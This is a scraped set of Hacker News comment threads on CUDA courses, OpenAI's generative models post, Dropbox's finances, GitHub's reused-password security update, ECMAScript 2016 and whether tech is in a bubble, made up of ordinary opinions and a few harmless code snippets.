http://people.maths.ox.ac.uk/gilesm/cuda/

http://cseweb.ucsd.edu/classes/fa15/cse260-a/lectures.html

https://www.coursera.org/course/hetero

7
Negative1 3 days ago 0 replies      
Are there any course videos available anywhere?
8
bathory 3 days ago 0 replies      
Is there any resource as good, that targets a recent version of OpenCL?
9
joosebox 3 days ago 0 replies      
Anyone know how this compares to the course(s) NVIDIA offers on Udacity?
10
hubatrix 3 days ago 0 replies      
Wish there were videos available for the same course! Can someone suggest a good lecture series with videos, other than Udacity?
26
Generative Models openai.com
334 points by nicolapcweek94  1 day ago   54 comments top 13
1
hasenj 1 day ago 8 replies      
This is so cool and I can't help but feel like I'm missing something important that's taking place and has huge potential.

As a busy programmer who gets exhausted at night from the mental effort required at my day job, I have a feeling like I will never be able to catch up at this rate.

Are there any introductory materials to this field? Something I can read slowly during the weekends, that gives an overview of the fundamental concepts (primarily) and basic techniques (secondarily) without overwhelming the reader with the more advanced/complicated techniques (at least at the beginning).

I'd really appreciate any recommendations.

2
andreyk 1 day ago 0 replies      
Brief summary: a nice intro about what generative models are and the current popular approaches/papers, followed by descriptions of recent work by OpenAI in the space. Quick links to papers mentioned:

Improving GANs https://arxiv.org/abs/1606.03498

Improving VAEs http://arxiv.org/abs/1606.04934

InfoGAN https://arxiv.org/abs/1606.03657

Curiosity-driven Exploration in Deep Reinforcement Learning via Bayesian Neural Networks http://arxiv.org/abs/1605.09674

Generative Adversarial Imitation Learning http://arxiv.org/abs/1606.03476

I think the last one seems very exciting, I expect Imitation Learning would be a great approach for many robotics tasks.

3
johnwatson11218 1 day ago 1 reply      
Have these techniques been used to generate realistic-looking test data for testing software? I have had ideas along these lines, but people think I'm talking about fuzz testing when I try to describe it.

I'm imagining something where you take a corporate db and reduce it down to a model. Then that can be shared with third parties and used to generate unlimited amounts of test data that looks like real data w/o revealing any actual user info.
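
As a toy version of that idea (illustrative only; the column names and per-column models are made up, and real tools would also need cross-column correlations): fit per-column statistics, throw away the rows, and sample synthetic records.

  import random

  rows = [{"age": 34, "plan": "pro"}, {"age": 51, "plan": "free"},
          {"age": 29, "plan": "free"}]  # stand-in for the corporate db

  # "Reduce the db to a model": per-column summaries only
  ages = [r["age"] for r in rows]
  model = {
      "age": (sum(ages) / len(ages), 10.0),  # (mean, assumed stddev)
      "plan": [r["plan"] for r in rows],     # empirical category distribution
  }

  def synthetic_row():
      mu, sd = model["age"]
      return {"age": int(random.gauss(mu, sd)),
              "plan": random.choice(model["plan"])}

  print([synthetic_row() for _ in range(3)])  # unlimited fake-but-plausible rows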

4
brandonb 1 day ago 1 reply      
Very cool. As you're thinking about unsupervised or semi-supervised deep learning, consider medical data sets as a potential domain.

ImageNet has 1,034,908 labeled images. In a hospital setting, you'd be lucky to get 1000 participants.

That means those datasets really show off the power of unsupervised, semi-supervised, or one-shot learning algorithms. And if you set up the problem well, each increment of ROC translates into a life saved.

Happy to point you in the right direction when the time comes; my email is in my HN profile.

5
viach 1 day ago 2 replies      
Looks like fake accounts on Facebook will have real unique userpics soon
6
ElHacker 1 day ago 1 reply      
I really like that they used TensorFlow and published their code in GitHub. It will help a lot of people like me, that are new in the field and want to learn more about generative models. Amazing work by the OpenAI team!
7
bradscarleton 1 day ago 1 reply      
It looks like they are using both TensorFlow and Theano. Is there a reason to use both?
8
j2kun 1 day ago 2 replies      
The actual outputs look grotesque. Disembodied dog torsos with seven eyeballs and such. It's cool, but to me this is clearly showing the local nature of convolutional nets; it's a limitation that one has to overcome if one is to truly generate lifelike images from scratch.
9
dkarapetyan 1 day ago 1 reply      
The generated images look like the stuff nightmares are made out of. Which is to say they're extremely aesthetically unpleasant. So what exactly have these networks learned?
10
Rexxar 1 day ago 1 reply      
Can we see the generated images somewhere at a higher resolution?
11
zump 19 hours ago 0 replies      
Why do I constantly feel like I'm missing out with all this stuff?
12
pestaa 20 hours ago 0 replies      
What beautifully presented research.
13
gradstudent 1 day ago 3 replies      
Interesting topic, tedious article. Paraphrasing:

Q: What's a generative model?

A: Well, we have these neural nets and...

Ugh. I understand the excitement for one's own research but if the point is to make these results accessible to a wider audience then it's important not to get lost in the details, at least not right away. IMO, there's very little here in the way of high-level intuition. If I did not already have a PhD, and some exposure to ML (not my area), I would probably find this article entirely indecipherable. Again, paraphrasing:

Q: OK, so I understand you want to create pictures that resemble real photos. And you really like this DCGAN method, right?

A: Yes! See, it takes 100 random numbers and...

Come on guys. You can do better.

27
Dropbox says it is cash flow positive, in no rush to IPO techcrunch.com
260 points by uptown  3 days ago   165 comments top 24
1
Razengan 3 days ago 10 replies      
I wonder what features Dropbox can offer that won't inevitably be surpassed by Google Drive, iCloud Drive, and OneDrive.

To me, their main strength seems to be that they have the best cross-platform UI/UX right now, but even that may not be the case for long.

Maybe they could evolve/branch into a general-purpose file hosting service, where people can use it to publicly share images (like imgur) and music (like Soundcloud) with the appropriate UI for each case (or spinoff site, e.g. Imagebox and Musicbox), except people would just need one account to comment/vote on everything. Who knows, maybe they can even become an alternative to YouTube...

Let independent developers publish their games and apps from there, bypassing Steam and the other app stores, optionally charging a fee per user, with Dropbox taking a cut.

Maybe even offer a chatroom/messaging system, to compete with Slack/Skype etc.

2
cylinder 3 days ago 9 replies      
More companies should disavow growth and aim to be stable, cash-generating entities. Dropbox is a utility. Unfortunately VCs don't like this.
3
bing_dai 3 days ago 3 replies      
I am surprised that Dropbox's investors would allow it. It also indicates that Dropbox likely does not have a Redemption Clause in their term sheet.

Redemption Clause basically says "if the company does not IPO or get acquired in X years, the company has to pay the investors back their money, plus a hefty interest".

It is a relatively unusual term, but not unheard of.

(Source: I used to work for a VC.)

4
post_break 3 days ago 3 replies      
Dropbox is the one service that I just can't replace. Nothing comes close to the ease of revisions/version control, restore, and sync. I sound like a bot but I've tried everything to find a replacement and I just keep coming back. It worries me because I don't like it when there is only one game in town.
5
refurb 3 days ago 2 replies      
Profitable or cash-flow positive? Those are two different things.

Cash flow positive - normal situation where the cash inflows during a period are higher than the cash outflows during the same period. Positive cash flow does not necessarily mean profit, and is usually due to careful management of cash inflows and expenditures.

6
TeMPOraL 3 days ago 5 replies      
I'm happy to hear that. As a Dropbox user and paying customer, it reassures me that they won't get acquihired or otherwise fuck up the product in a typical startup fashion any time soon.
7
tacos 3 days ago 1 reply      
> Dropbox says it is cash flow positive, in no rush to IPO

This means the fundamentals are a shitshow and that they couldn't even if they wanted to. Investors believe they can get a better valuation via private sale than risk letting the public market provide a reality check. (See also: Sam Altman.)

They're getting bought; it's just a matter of when and how bad things get first.

8
mark_l_watson 3 days ago 1 reply      
I love Dropbox's support for a GNU Linux client. That said, and ironically, I am no longer a paying customer since they put Condi Rice on their board of directors. If Rice quits their board, I will immediately become a paying customer again.

Annoying that Google and Microsoft don't have official Linux clients for GDrive and OneDrive, but at least their web based support is passable.

9
KB1JWQ 3 days ago 2 replies      
I wonder how their current and former employees view this decision.

I further wonder whether people leaving have a 90-day window to either exercise or forfeit their options.

10
mankash666 3 days ago 2 replies      
Just to bust their chops on valuation - Box is valued at $1.42B today. Dropbox had better have 10X Box's revenues and profits to justify the $10B valuation. My guess is that they don't, and hence they're disinclined to address public scrutiny of their financials and/or valuation.
11
PhasmaFelis 3 days ago 1 reply      
It is so bizarre to me that building a business that can make a profit and stand on its own is considered newsworthy in the tech economy.
12
hueving 3 days ago 1 reply      
I feel bad for the employees. Remember this is another risk when considering offers from startups. Your shares may be illiquid for a very long time.
13
nathan_f77 2 days ago 0 replies      
Damn, imagine being an early employee at Dropbox, holding onto a lot of stock that you can't sell until an IPO. This situation is probably your worst nightmare. If anything, you want the company to struggle a little bit so that they're forced to raise more money in an IPO.
14
ekiara 2 days ago 0 replies      
Great to hear an alternative story (i.e. a non-exit or IPO story) out of Silicon Valley.

mega.nz does not have the great desktop/device UI that Dropbox has, and Kim Dotcom has stated it can no longer be trusted after the company was seized by the New Zealand government. But it offers 50GB to any new account. How do they manage to do this? And what is stopping someone from just registering a bunch of accounts on mega.nz and using that as their primary cloud backup? (maybe with the addition of encfs or something)

15
nemock 3 days ago 0 replies      
This is always a cool thing to see in Silicon Valley. Way to go, Dropbox.
16
laktak 2 days ago 0 replies      
I really like Dropbox but I will leave if they force anything like Infinity (http://blogs.dropbox.com/tech/2016/05/going-deeper-with-proj...) onto us users.
17
erikb 2 days ago 0 replies      
For the users it would be so great to have Google buy Dropbox. I use Drive all day long, but only for Google documents. Everything on the computers is either hosted in Dropbox or in ownCloud. But I think Microsoft is much more likely to buy them than Google. What a pity.
18
sjg007 2 days ago 0 replies      
For me it should be seamless to send and receive large files on your iPhone. You can do this in Dropbox, but it isn't as simple as "send to X via Dropbox".
19
nstj 3 days ago 0 replies      
> Houston claimed that Dropbox has been cash flow positive, emphasizing that this milestone for a business means you control your destiny. Instead of being funded by your investors, you're funded by your customers.

Accounts payable for SaaS businesses is the new VC on the block. Gold.

20
rtpg 2 days ago 0 replies      
Glad to hear Dropbox is cash flow positive. I was pretty worried at one point about what would happen to all the apps relying on Dropbox for sync

<insert platitude about open systems here>

21
JackPoach 2 days ago 0 replies      
I wish they'd make their finances more transparent, rather than just saying 'cashflow positive'.
22
gadders 2 days ago 0 replies      
Presumably this is against the interests of YC and the other VCs that invested, though?
23
ajharrison 2 days ago 0 replies      
Sounds like he wants someone to buy Dropbox.
24
gauravagarwalr 3 days ago 2 replies      
This is a bot! Flagged! OTOH Have you tried Google Drive?
28
GitHub Security Update: Reused Password Attack github.com
241 points by ejcx  2 days ago   131 comments top 12
1
kiwidrew 1 day ago 3 replies      
I received this e-mail and had my password reset by GitHub. Based on the "security history" shown in my GitHub account's settings page, my account wasn't compromised, as there was no login activity during the past week.

I'm thinking that this is fallout from the LinkedIn breach, because this is the first high-profile breach which includes one of my e-mail addresses. (How do I know this? I'm using haveibeenpwned.com -- a free service that I highly suggest registering with.)

2
natch 2 days ago 2 replies      
What the page doesn't tell me is: What is their definition of an "affected" account?

Obviously one where an attempt was made, and succeeded, would count as affected.

But would an account where an attempt was made, and failed, also count?

What if the userid and password are correct, but 2FA stopped the attack on an account. Is that account affected, in their view?

3
ikeboy 1 day ago 3 replies      
I feel like sites should somehow preemptively disable passwords that have leaked publicly. Is there a simple way for them to do so without downloading every leak themselves? Is there a simple way for whitehats to help out? Whitehat means you can't test the site without their permission, but someone could maintain a database that they provide partial access to for sites, without leaking and spreading it further themselves?

Here's an idea I just thought of: sites should have a standardized, secondary place to log in, where if the login is correct it automatically disables the password and requires a reset. "Report a compromised account", as it were. Anyone (or maybe specific whitehat groups) should have explicit permission to try any logins they want there: after all, if they succeed in logging in then the right thing happens and the account is locked. It's impossible to gain any illicit advantage from such access because any correct credentials are locked as soon as you try them. (Is this assumption robust?) So whitehats could then take lists and throw them against sites that implement this standard, but no attackers can gain from this.

The only problem I see is that disabling rate limits would open you to DoS (also if multiple people use the same list, although better coordination would help solve that): maybe allow bulk uploads, which take less bandwidth overall.

Does this idea have any value?
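
For what it's worth, the mechanism is small. A minimal sketch, assuming a Node/Express app with bcrypt-hashed passwords; findUserByEmail and lockAndRequireReset are hypothetical stand-ins for whatever user store a real site has:

  const express = require('express');
  const bcrypt = require('bcrypt');
  const app = express();
  app.use(express.json());

  // "Report a compromised account": correct credentials get locked
  // and forced into a reset, so a successful "login" here can only
  // help the account's owner.
  app.post('/report-compromised', async (req, res) => {
    const { email, password } = req.body;
    const user = await findUserByEmail(email);        // hypothetical
    if (user && await bcrypt.compare(password, user.passwordHash)) {
      await lockAndRequireReset(user);                // hypothetical
    }
    res.status(204).end(); // same reply for hit or miss: no oracle
  });

  app.listen(3000);

Replying identically whether the credentials matched or not is the load-bearing detail: otherwise the endpoint doubles as a free credential-checking oracle, and the "is this assumption robust?" question above would get a firm no.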

4
jrockway 2 days ago 6 replies      
I hadn't noticed that Github started supporting U2F. Nice to finally use my keys for something other than Google accounts.
5
arxanas 1 day ago 2 replies      
I got an email from Bitbucket earlier today warning me about unusual behavior on my account as a result of reused credentials. Is it an attack across several version-control services?
6
Pyppe 1 day ago 2 replies      
Related to password security: are any of you guys using Chrome's ability to sync passwords to the "Google cloud"?

I just started using it a few weeks ago. Supposedly it uses a password to encrypt the data, but I still don't feel too confident syncing them there. On the other hand... damn, it's so convenient between multiple devices.

7
ComodoHacker 1 day ago 2 replies      
This is far better than TeamViewer's response to the same threat lately.
8
markokrajnc 1 day ago 3 replies      
Passwords became hard to manage... now you have to choose a >>different<< password for every site... Who can remember all those passwords? Only a password manager...
9
tuna-piano 2 days ago 1 reply      
Anecdote: I use an email account and a relatively simple password (3 relatively common words together) on LinkedIn. I don't use that email account much, but it was affected by the Linkedin hack. Today I get an email saying my Twitter account was accessed suspiciously (same credentials).

Such is the power of the network effect that I won't leave LinkedIn, and wouldn't think twice before spending money on the platform if I needed to recruit someone or do B2B sales. But screw LinkedIn for not taking proper precautions.

10
ledude 2 days ago 1 reply      
Just a random tidbit... but the system currently allows you to set your password to what you previously had.
11
brador 1 day ago 2 replies      
Why not do a site-wide reset on every account?
12
akerl_ 2 days ago 2 replies      
"We immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts."
29
ECMAScript 2016 Approved ecma-international.org
220 points by gsklee  1 day ago   71 comments top 10
1
BinaryIdiot 23 hours ago 7 replies      
I wish this contained a delta between the previous release and this release. It's difficult to find the differences just by skimming.

Edit: apparently I hadn't realized that the changes were so few that what was in the outline really did cover everything. I thought it was just a summary. My fault.

That being said, I continue to be disappointed in the built-in standard library of JavaScript. As far as I can tell, ECMAScript 2017 also has zero plans for incorporating useful libraries for file IO or sockets (currently both are provided through different APIs by Node or the browser). This really needs to happen.

2
jsingleton 15 hours ago 2 replies      
So, ECMAScript 2015 is ES6 and ECMAScript 2016 (this) is ES7 [0]. I like the new features (promises, arrow functions etc.) but the naming is as confusing as Visual Studio. VS 2015 is the current version but VS 15 is the next one.

[0] https://en.wikipedia.org/wiki/ECMAScript

3
domenicd 22 hours ago 0 replies      
As always, see https://tc39.github.io/ecma262/ for the up-to-date spec that implementers use.
4
edwinjm 19 hours ago 1 reply      
"This specification also includes support for a new exponentiation operator and adds a new method to Array.prototype called includes."

Not much new here for regular JavaScript developers.
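
For reference, that really is the whole release; both additions fit in a few lines:

  Math.pow(2, 10) === 2 ** 10;      // true: the new exponentiation operator
  let n = 3; n **= 2;               // 9: the assignment form works too
  [1, 2, NaN].includes(NaN);        // true
  [1, 2, NaN].indexOf(NaN) !== -1;  // false: indexOf can't find NaN

The NaN behavior is the practical difference: includes uses SameValueZero comparison, while the old indexOf idiom uses strict equality and so always misses NaN.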

5
dpweb 17 hours ago 5 replies      
They should be working to make JS smaller and simpler and better. Focus on the philosophy of what JS should be. People instead tend to focus on 'new features'.

The power in JS is functional programming. Grafting on classes, for instance, was a mistake. They could focus on concepts like how we make sure we never create two ways to do the same thing - instead of how we incorporate this new thing.

6
SimeVidas 1 day ago 0 replies      
504 pages according to Chrome's print preview.
7
0xCMP 23 hours ago 4 replies      
Does anyone know if decorators made it in? I can't find them via the search at first glance. I'm guessing they're listed under a different name/section than I thought?
8
z3t4 21 hours ago 1 reply      
Why don't they "fix" the numeric system to be more exact? I'm talking about the float implementation. I don't think anyone depends on the floating point rounding errors. But we do spend a lot of time avoiding them. They totally "screwed up" the syntax in 2015, with many breaking changes, so why not fix the damn rounding errors!?
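
For context: JS Numbers are IEEE 754 doubles, the same binary format most languages use, so the rounding below isn't unique to JavaScript, and "fixing" it would mean abandoning hardware floats. The classic demonstration, plus two common workarounds:

  0.1 + 0.2;                                     // 0.30000000000000004
  0.1 + 0.2 === 0.3;                             // false
  Math.abs((0.1 + 0.2) - 0.3) < Number.EPSILON;  // true: epsilon compare
  (10 + 20) / 100;                               // 0.3: do money in integer cents
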
9
sktrdie 22 hours ago 1 reply      
Did Observables make it in with the `async function* SomeObservable() {}` type of syntax?
10
_pmf_ 13 hours ago 1 reply      
These 10 ECMA Features Taken From Actually Useful Languages And Presented As Cool Innovations Will Blow Your Mind!
30
'We're in a Bubble' samaltman.com
267 points by dwaxe  3 days ago   200 comments top 53
1
minimaxir 3 days ago 2 replies      
I'm disappointed to see this from Sam.

After Twilio filed for IPO, someone wrote a "here's what Hacker News said about Twilio," which only focused on the hilarious-in-hindsight but negative comments about the startup (https://news.ycombinator.com/item?id=11786464). Naturally, it got massive retweets from venture capitalists who espouse the haters-gonna-hate attitude.

As dang notes in that other comment thread, this kind of argument doesn't look at the other side at all: there have been some seriously shady dealings going on with unicorn startups. IPOs are failing. And let's not get started on Theranos.

2
YZF 3 days ago 4 replies      
"Markets can remain irrational longer than you can remain solvent"

Or perhaps the more apt way of putting this in our times is: "Multiples will be crazy high as long as central banks keep interest rates crazy low"

Rather than thinking about this in terms of bubbles I think it's fair to say that the probability of getting very high ten year returns on the US stock market at these valuations is low. The problem is there's no other asset that will give you the chance of a better return. That's no coincidence.

Apple's P/E is 10.85 according to Yahoo Finance. That's low given current interest rates.

EDIT: The average Nasdaq P/E is 22.55... This is historically high, but a P/E of 22.55 is an earnings yield of 1/22.55 ≈ 4.4%, vs. the 10-year treasury at 1.61% (and I say that painfully, as I attempted to go short at one point). That is basically the story right there.

3
baristaGeek 3 days ago 6 replies      
Those of us who are young enough (30 or less) not to have witnessed the internet bubble at a conscious age might be tricked into thinking we're in a bubble due to certain indicators: the NASDAQ index, the valuation prices, the money poured into venture capital, etc.

To those of you like me, I recommend reading about what was happening in '95-'99. The landscape was crazy, and today's context doesn't compare to the one of those days.

In the end, if the macroeconomic environment changes, who cares? Yes, paying attention to the macro is important and that may even imply changes in strategy, but should you not start a startup because there's a bubble? Even worse, should you (a person who hasn't built anything but criticizes everyone who builds something) try to convince your friends not to start startups because we're in a bubble?

The main difference between today and 1999 is that digital products are actually generating value in people's lives. Please don't compare pets.com to WhatsApp.

4
caffeinewriter 3 days ago 4 replies      
Just because the bubble hasn't burst yet doesn't mean we're not actually in a bubble. That line of reasoning irks me a bit, but still, it is laughable how the imminent bursting of the bubble has been predicted for nearly a decade.
5
bdrool 3 days ago 2 replies      
If the intended insinuation of this essay is that somehow there aren't a bunch of seriously over-valued companies out there, or that there isn't a long-overdue downturn on the way, then I'm afraid I can't bring myself to agree.

People young enough to have never been through a downturn in their professional career are usually in denial right up until the moment it happens. And the people who try to call the bubble early, as funny as it may be to make fun of them as is being done here, are usually the ones who have been through it before, see it coming early, and try to warn everyone, even though no one ever listens (too busy enjoying the party!)

6
spitfire 3 days ago 0 replies      
Over the last 16 years we've seen several boom/bust cycles in speculative markets driven by interest rates.

First the bursting of the first tech bubble. Then Greenspan's housing bubble in 2001-2007. Then interest rates were held abnormally low, for 80 months straight, which is something the world has _never_ seen.

Would we have seen this tech boom if interest rates had been, say, 5% and capital had somewhere else to flow?

I'm pretty wary of "The music hasn't stopped playing, so it can't possibly be a bubble" arguments. Let's watch what happens as rates go up and venture-backed tech has to compete with other returns.

7
rrggrr 3 days ago 0 replies      
Those aged 65 and up control most of the investment capital in the United States. This is not a risk-taking demographic, regardless of whether the capital is family money or managed money. It is a demographic that wants to preserve capital in exchange for modest returns.

The same can be said for pension plans who formerly invested heavily in alternative investments, and who now must ensure fund stability as pension payouts peak in the coming years.

Foreign investors and sovereign funds are under increased pressure to keep foreign currency at home, particularly in China and Russia.

Interest rates are poised to rise, held back by a US Federal Reserve loaded, cocked, and ready to fire, thereby increasing VC carrying costs.

The global political environment is not favorable for economic investment. Highly publicized bellicose rhetoric and outright conflict is pervasive. Investors loathe the uncertainty and anxiety this creates.

So, this time it's different

I suspect there may be strong returns to be had in M&A, particularly after Microsoft's aggressive bid for LinkedIn. I note even Twitter is performing well today*. I imagine there may still be strong IPOs, like Twilio seems positioned to be. But I believe we're entering a less liquid and lower-alpha period in investing.

I can't say I have special knowledge on the topic, other than being a close observer.

(Disclaimer: I do own TWTR)

8
profmonocle 3 days ago 2 replies      
> One analyst predicts Facebook will easily be worth $200 billion by 2015. Right on! And by 2020 it could be the first company with a $1 zillion market value, so buy-buy-buy, everybody!

Decided to look this one up. It hit $200B in late 2014, so that prediction was impressively spot-on: https://ycharts.com/companies/FB/market_cap

9
doppp 3 days ago 6 replies      
Sam HAS to play down the fact that we are in a tech bubble. He is, after all, a venture capitalist, so do note the conflict of interest here.

My friend referred me to this Bill Gurley article [1]. My metric for whether there is another bubble is not so sophisticated. I feel that there is a bubble when celebrities (like sports personalities) begin investing in questionable startups [2][3]. Harkens back to the '99 bubble.

Edit: Before you bring up Ashton Kutcher, a single data point does not a trend make. But yes, we've been in a bubble long before he began investing actually.

[1]: http://abovethecrowd.com/2014/01/24/on-bubbles/

[2]: http://www.vanityfair.com/news/2016/04/kobe-bryant-silicon-v...

[3]: https://e27.co/boxing-champion-manny-pacquiao-throws-his-hat...

10
mark_l_watson 3 days ago 0 replies      
Well, that is the problem with people predicting the future: they may be correct on fundamentals but the world is a chaotic place and predicting just when something will happen, even if it is likely to happen in the future, is a bad bet.

I personally believe that the current economic regime, requiring constant growth (and large growth) for health, is not sustainable. Am I willing to bet on when the next big economic crash will occur? No.

11
gedrap 2 days ago 0 replies      
I don't really get the point.

So at the moment, today, the tech industry isn't dead or crashed. So we can find people who said that it would be and point out that they were wrong. And if the crash comes tomorrow, are we going to say "well, it was predicted, soooo...", do the usual post-fact rationalization on how obvious it was, etc.?

But so what? We can do exactly this for any prediction whatsoever. Wars, financial crashes, economic and political events, etc. People, from cab drivers to executives and ministers, make wrong predictions all the time.

I honestly don't see the point of it, other than to highlight that someone was wrong and... feel good about yourself that you were on the winning side this time?

Should we stop predicting? Yeah, probably. But the ending 'And now Trump thinks we're in a tech bubble too, so maybe it's true.' doesn't really deliver this message.

12
coldtea 3 days ago 1 reply      
One difference between a bubble and a declining market segment is that the bubble bursts -- abruptly.

So it doesn't matter whether people repeat prophecies of doom for a long time or not -- unless it's actually a bubble, it won't ever burst. At worst it will start declining slowly.

That's why arguments like "it hasn't burst all those years, so it's not a bubble" don't get it either.

Being a bubble is not something that has to do with duration (whether it lasts for a long time or not) -- it has to do with the non-linear effects of the burst.

Of course if the burst never comes, or it's instead some gradual decline, then it's not a bubble.

13
reilly3000 3 days ago 0 replies      
The only real indication that we are in a bubble is the frailty of the future of digital advertising. I don't think there are many hypervalued hardware firms. Advertising hinges on corporate and consumer purchasing power, which seems to be healthy if slightly waning, and to a certain extent on personal tolerance of ads and highly abundant Web content. Outside of the US, the appetite for both continues to grow year over year. While display on publisher sites has many weak spots, search and social ads have a solid footing in most advertisers' budgets. They won't disappear overnight. What will?
14
jasonjei 3 days ago 2 replies      
The Microsoft LinkedIn acquisition seems to have positively signaled investor confidence, in spite of calls that the sky is falling. Whatever odds there were for a "bubble burst" are probably lessened by this purchase.
15
Dwolb 3 days ago 0 replies      
This post suffers from confirmation bias, which feels weird coming from a writer whose entire accelerator is founded on principles that exploit other people's biases (e.g. others are biased toward teams with traditional credentials, whereas YC evaluates more on accomplishments and building things).
16
nikdaheratik 2 days ago 0 replies      
Whatever this is, it isn't a repeat of the late 90s. The term "bubble" doesn't even mean anything except that a lot of people, many of whom aren't even investing or selling short, assume that the prices are way higher than they should be.

The 90s was a typical gold-rush type of scenario where no one knew what anything was worth, and so investment continued until someone figured out that there was no way everyone could make money even if the entire mountain was made of gold, and started betting against the herd.

Going by the cyclical pattern, we're overdue for a recession in the U.S. However, no one knows how severe it could be, especially considering that the "recovery" from the '08 meltdown was tepid at best.

As far as tech investing goes, the best way to make money is to back a number of good looking horses and hope the wins pay for the losses. Which is the same as it always was. If you're smart, you'll also diversify in case something does happen to cause the entire industry to take a dive. However, short of a major quake taking down most of SV, the number of different ways businesses are trying to make money means that, IMO, it's more difficult for one event to take them all down, unlike 1999.

17
adventured 3 days ago 0 replies      
It seems like it was just yesterday that everyone was arguing the Facebook valuation from Microsoft's investment was impossible to ever live up to.

$15 billion. They'll do half that in net income in the next four quarters.

Interestingly, the $125 per user figure quoted in the Gigaom article (the $15 billion valuation divided by their daily actives or total users at the time) is now more like $195 per user (1.68 billion daily actives with a $328B market cap).

18
alekratz 3 days ago 2 replies      
If you say "we're in a XYZ bubble" for long enough, you'll eventually be right.
19
aabajian 3 days ago 1 reply      
Anecdotal, personal, and completely my opinion, but my parents' entire life savings is $750,000. That's about how much Mike Markkula invested in early Apple ($250,000 in 1977 dollars, adjusted for inflation). I like this figure because it represents a serious amount of money - you could retire off of it, if you're frugal. So why take the risk of investing such a large sum in a startup?

I presume that the objective of investors (who have much more money than $750K) is either to a) make money or b) make money and bring a new technology/innovation to market. In a bubble I see more of the former (focus on money) without the innovation piece. How many car-sharing (Uber/Lyft/Sidecar), food-delivery (GrubHub/OrderAhead/DoorDash), and credit card alternatives (Venmo/Coin/Stratos) do we really need? Would the founders of such companies put their retirement savings into starting these companies? Maybe, maybe not.

Innovation is key to keeping a bubble at bay. Y Combinator has quite a few companies where the goal is to make money through innovation. These are ventures dedicated to biomedical research (DNA sequencing/gene mapping), novel algorithm development (AI/machine learning), improving social welfare (water filtration/education), etc. I'd be happy to see a world full of these, and I wouldn't call it a bubble. It would be people pursuing ideas that could solve real problems in the world. Ideas that are worth investing your (and therefore an investor's) money in.

I believe that innovative companies keep a bubble at bay precisely because they are less likely to succeed. Investors must faithfully evaluate innovative companies to see if their technology is feasible and if the market is ready.

20
datashovel 3 days ago 0 replies      
I have a hard time understanding precisely what gives these companies such high perceived values.

In the end I have to believe people are measuring the value based almost exclusively on the website's "traction". Frankly, I think "traction" is an outdated metric (especially when it comes to the web).

I almost feel like I have to remind folks here (who are arguing against the premise that we're in the middle of a period of extraordinarily excessive valuations) that the web provides an almost frictionless environment for change. If tomorrow someone launches a better LinkedIn, there is ZERO reason I can't switch over (or use both) that same day.

In tomorrow's world I expect individual engineers (or surely teams of fewer than 10) to have the capacity to build a product better than LinkedIn, at and beyond the scale of LinkedIn, in their garage (thanks to the cloud). With little to no investment.

In the future (by my estimation the not-too-distant future) $20+ billion for a resume website will be unconscionable (if it isn't already).

21
draw_down 3 days ago 1 reply      
The strangest thing to me is how upset this makes people, even though it doesn't affect them, at least not directly. Look at the quote about Facebook's valuation - who gets so upset about that?

Why is it an affront to you if some business guys can figure out a way to call FB worth $33B? Of course now nobody would question that, because they're one of only two games in town when it comes to advertising. But even before that, why get so pissy? If the valuation is sooo crazy then bet against it. Why get so upset that LinkedIn sold for $26B? If you think MS wasted their money then let them waste it.

Why be so concerned that VCs are making bad bets? Let them! Are you a limited partner? Then who cares?!

I get that people don't like the knock-on effects, rent goes up, engineers are harder to hire. But I don't see why anyone should give a shit if a dumb VC wasted their firm's money on a dumb idea.

22
vasilipupkin 3 days ago 0 replies      
The fact that there are very few tech IPOs is probably the best indication that there is a bubble in common stock valuations of private companies, which would not be supported by public markets. Why? Because public markets have many sophisticated players who can easily sell short, and private markets don't.
23
ijafri 3 days ago 1 reply      
I don't think the bubble thing is true for our time, nor will it be in the near future; it's just that tech has become more competitive than ever. I am too young to know exactly the circumstances surrounding the last dot-com bubble when it happened... but I guess it could have happened because the VCs had not seen the full potential of the internet back then...

I can't buy the notion that we will ever see a bubble... it's just ups and downs, as with just about anything in life... because at this point, and in the future, the internet is too large to be vulnerable to one.

But that said, there is little room left for developers living in their mom's basement, and that's truly sad.

24
TedHerman 2 days ago 0 replies      
As other comments point out, whether there is a bubble (extreme overvaluation) or not depends in part on the financial background. If you just look at interest rates, they tell us that the future will be stable, the world is awash in capital, and you'll have decades to extract the value of your investment. For example, the $247 per LNKD user could be reasonable, notwithstanding that only around 1/4 of these users reportedly are active. So over 20 years, getting about a dollar a month per user will break even. And this is just one aspect, since global growth trends and unlocking network effects offer more value. But these metrics don't give the whole story. The central banking infrastructure pumps capital into the world due to deflationary fears, so can we really trust interest rates and assumptions of stability and growth trends to determine whether the value of unicorns is enduring?

An interesting aspect is Altman's position, argued by citing "they were wrong time and time again" data points. His day job is to create new ventures, some of which will presumably disrupt existing giants and lower their value. This dynamic is dangerous to the assumption of stability in organizational trends upon which value metrics are based. In some sense, there is overvaluation (because new opportunities are undervalued), if not a bubble.

25
gchokov 2 days ago 0 replies      
Hilarious article. The fact that Silicon Valley VCs can make money out of extremely overpriced companies doesn't make them right. It's just an arrogant read this time. Mr Sam - you should be ashamed.
26
crystaln 2 days ago 0 replies      
This seems to violate YC and Paul Graham's general disdain for sarcasm.
27
api 3 days ago 0 replies      
We just lived through two mega-bubbles: dot-com and real estate. Actually three, if you count oil. People now see bubbles everywhere and in everything.
28
datashovel 3 days ago 0 replies      
One of my most memorable "bubble talk" moments was when I was living in South Florida. To clarify, that's only to say it's easy for me to recall given the unique circumstances of the conversation, not that it was particularly enjoyable for anyone involved.

A bunch of my co-workers and I were out to lunch with a new member of our team (management level). The conversation turned to the real estate boom that we were in the middle of. The new guy had already, during the conversation, let us all know he had made a nice chunk of change in real estate recently, and was in the middle of looking for a new house with his wife. They apparently had their eye on a few really nice waterfront properties. That sort of got a few folks talking "bubble". He laughed it off and smugly told us all that (paraphrased) "in reality the market is just going to keep going up."

Famous last words - he ended up closing a few months before the crash.

29
selectron 3 days ago 0 replies      
Markets can stay irrational for longer than you can remain solvent. Just because the bubble hasn't burst, doesn't mean we are not in one. Of course the converse is also true, just because the market has been going up doesn't mean it will go down. It will be interesting to see what happens if the Fed ever raises the interest rates.
30
baron816 3 days ago 2 replies      
Can anyone point to a bubble where everyone was, for years, constantly asking whether or not it's in a bubble?
31
akjetma 3 days ago 0 replies      
I wonder if the frequency of "We're not in a bubble" articles tracks its counterpart over time.
32
andyfleming 3 days ago 0 replies      
I don't think the bubble is just going to "burst". I think the rapid growth in technology is real. The market may correct itself some, like it is right now (particularly with investors), but I don't think there is going to be a great tech apocalypse.
33
newacct23 3 days ago 1 reply      
